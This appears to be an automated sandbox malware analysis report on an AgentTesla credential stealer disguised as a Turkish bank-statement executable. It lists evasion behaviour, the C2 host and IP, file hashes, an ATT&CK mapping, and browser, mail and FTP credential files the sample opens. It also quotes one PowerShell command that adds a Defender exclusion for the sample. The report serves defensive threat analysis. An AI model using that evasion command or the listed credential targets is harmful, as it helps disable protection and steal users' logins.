                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1197083s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196953s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196843s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196734s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196625s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196515s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196403s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196297s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196187s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1196078s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195969s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195844s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195700s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195592s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195482s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195375s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195266s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195156s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1195019s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1194891s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1194766s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1194641s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1194531s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe TID: 7340 Thread sleep time: -1194422s >= -30000s
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: hesaphareketi-.exe, 00000004.00000002.3683175969.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%O
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Memory written: C:\Users\user\Desktop\hesaphareketi-.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Process created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hesaphareketi-.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 6760, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.3666088.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.36a04a8.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.36a04a8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.hesaphareketi-.exe.3666088.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 5740, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 6760, type: MEMORYSTR
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 21 Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Source | Detection | Scanner | Label
                      hesaphareketi-.exe | 37% | Virustotal
                      hesaphareketi-.exe | 39% | ReversingLabs
                      hesaphareketi-.exe | 100% | Avira | HEUR/AGEN.1323929
                      hesaphareketi-.exe | 100% | Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      ftp.normagroup.com.tr | 11% | Virustotal
                      Source | Detection | Scanner | Label
                      https://account.dyn.com/ | 0% | URL Reputation | safe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                      http://ftp.normagroup.com.tr | 100% | Avira URL Cloud | malware
                      http://ftp.normagroup.com.tr | 11% | Virustotal
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      ftp.normagroup.com.tr | 104.247.165.99 | true | true | | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://ftp.normagroup.com.tr | hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp | true | 11%, Virustotal; Avira URL Cloud: malware | unknown
                      https://account.dyn.com/ | hesaphareketi-.exe, 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hesaphareketi-.exe, 00000000.00000002.1238001511.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      104.247.165.99 | ftp.normagroup.com.tr | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1463495
                      Start date and time:2024-06-27 09:18:58 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 54s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:hesaphareketi-.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/6@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 182
                      • Number of non-executed functions: 18
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      Time | Type | Description
                      03:19:48 | API Interceptor | 11524180x Sleep call for process: hesaphareketi-.exe modified
                      03:19:50 | API Interceptor | 13x Sleep call for process: powershell.exe modified
                      Match | Associated Sample Name / URL | Detection | Threat Name
                      104.247.165.99 | hesaphareketi-.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi-01-pdf.exe | malicious | AgentTesla
                      104.247.165.99 | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla
                      104.247.165.99 | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi-14-06-2024.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi01.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi01--.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi-01.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi-.exe | malicious | AgentTesla
                      104.247.165.99 | hesaphareketi-.exe | malicious | AgentTesla
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      ftp.normagroup.com.tr | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi-14-06-2024.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi01.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi01--.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi-01.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                      ftp.normagroup.com.tr | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      ASN-QUADRANET-GLOBALUS | hesaphareketi-.exe | malicious | AgentTesla | 104.247.165.99
                      ASN-QUADRANET-GLOBALUS | hesaphareketi-01-pdf.exe | malicious | AgentTesla | 104.247.165.99
                      ASN-QUADRANET-GLOBALUS | RFQ678903423_PROD_HASUE_de_Mexico_ExportS.exe | malicious | Remcos, DarkTortilla | 64.188.26.202
                      ASN-QUADRANET-GLOBALUS | BNP DOC 12578945329763-7633562829.exe | malicious | Remcos | 104.223.119.206
                      ASN-QUADRANET-GLOBALUS | 19-03-2024_Takas_Sonuclari.exe | malicious | AgentTesla | 104.247.165.99
                      ASN-QUADRANET-GLOBALUS | SWU5109523I.exe | malicious | FormBook, Lokibot | 104.129.27.23
                      ASN-QUADRANET-GLOBALUS | BL-RTM1439068.vbs | malicious | GuLoader, Remcos | 64.188.16.157
                      ASN-QUADRANET-GLOBALUS | Hecker Glastechnik - Bestellung #009449 PDF.wsf | malicious | AgentTesla, GuLoader | 45.66.217.104
                      ASN-QUADRANET-GLOBALUS | AWB Shipping Docs No-285380XXX.exe | malicious | Remcos | 104.223.119.206
                      ASN-QUADRANET-GLOBALUS | UNCR76301078976375.wsf | malicious | AgentTesla, GuLoader | 45.66.217.104
                                          No context
                                          No context
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1500
                                          Entropy (8bit):5.345358309061185
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
                                          MD5:215B3562F83C4FB9BBB129D2F9E59ADA
                                          SHA1:0534A53F6F42ECA7E56EB02E328A2025254AC511
                                          SHA-256:4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
                                          SHA-512:E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
                                          Malicious:true
                                          Reputation:low
